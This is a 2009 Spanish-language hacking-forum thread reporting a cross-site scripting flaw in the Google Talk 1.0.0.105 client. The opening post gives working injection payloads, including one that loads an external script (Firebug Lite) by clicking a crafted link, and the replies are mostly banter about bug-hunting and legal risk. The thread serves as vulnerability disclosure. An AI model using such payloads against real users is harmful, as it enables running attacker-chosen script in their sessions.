elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección.


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  XSS en Google Talk 1.0.0.105
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: XSS en Google Talk 1.0.0.105  (Leído 6,359 veces)
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.264


The Hacktivism is not a crime


Ver Perfil WWW
XSS en Google Talk 1.0.0.105
« en: 18 Octubre 2009, 01:54 »

Bueno, comenzé a probar en una virtual de gtalk a gtalk y me encontré con dos xss.
Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.

Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>

xDD y el resultado es algo asi como esto:



Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write



A los que quiean inyectar el firebug pueden escribir estas dos lineas:
Citar
http://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x='
hacerle click y luego
Citar
http://'onclick='alert(firebug.init())'x='
y al hacerle click llamarán a firebug  :P

Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: XSS en Google Talk 1.0.0.105
« Respuesta #1 en: 18 Octubre 2009, 21:35 »

os aburris mucho,verdad¿¿   ;-) ;-) :P
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Jubjub


Desconectado Desconectado

Mensajes: 708


Lay Ladie lay,...


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #2 en: 18 Octubre 2009, 21:38 »

Grandes ;D
En línea

Jugando con Fósforoshacking con un tono diferente


.
porno
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #3 en: 21 Octubre 2009, 15:06 »

que gente... se nota el tiempo libre jaja xDD
Y google no podria hacer nada al respecto? no pueden denunciaros o algo por el estilo??

Saludos
En línea

:ohk<any>


Desconectado Desconectado

Mensajes: 1.739


Yo lo que quiero que me salga bien es la vida.


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #4 en: 21 Octubre 2009, 15:58 »

genial ;D
En línea

Y es que a veces pienso que si no estuviera loco no podría salir adelante.
Lo que no se es capaz de dar, en realidad no se posee, uno es poseído por ello.
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #5 en: 21 Octubre 2009, 17:53 »

Nah.... Google regala poleras xD
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #6 en: 21 Octubre 2009, 18:20 »

Nah.... Google regala poleras xD
enserio, si haceis este tipo de cosas peuden tomar algun tipo de carga legal contra el atacante/tester?

Saludos
En línea

jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #7 en: 21 Octubre 2009, 18:39 »

Conociendo a los descubridores... Google ya debe estar enterado y preparando una actualización xD
En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.264


The Hacktivism is not a crime


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #8 en: 21 Octubre 2009, 20:49 »

google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: XSS en Google Talk 1.0.0.105
« Respuesta #9 en: 21 Octubre 2009, 22:05 »

google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
jaja ok xD

Saludos
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Google Talk empieza a funcionar de nuevo
Noticias
wolfbcn 0 792 Último mensaje 26 Julio 2012, 18:09
por wolfbcn
Grave fallo de privacidad en Google Talk
Noticias
wolfbcn 0 798 Último mensaje 26 Septiembre 2013, 18:43
por wolfbcn
Talk Any con Wine
GNU/Linux
Joe Fraddy 0 770 Último mensaje 22 Diciembre 2014, 03:13
por Joe Fraddy
Adiós, Google Talk, te echaremos de menos
Noticias
wolfbcn 0 905 Último mensaje 3 Febrero 2015, 18:27
por wolfbcn
Google Talk desaparece a partir del 23 de febrero
Noticias
wolfbcn 1 808 Último mensaje 16 Febrero 2015, 23:14
por --<<<@u6u$t0>>>--
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines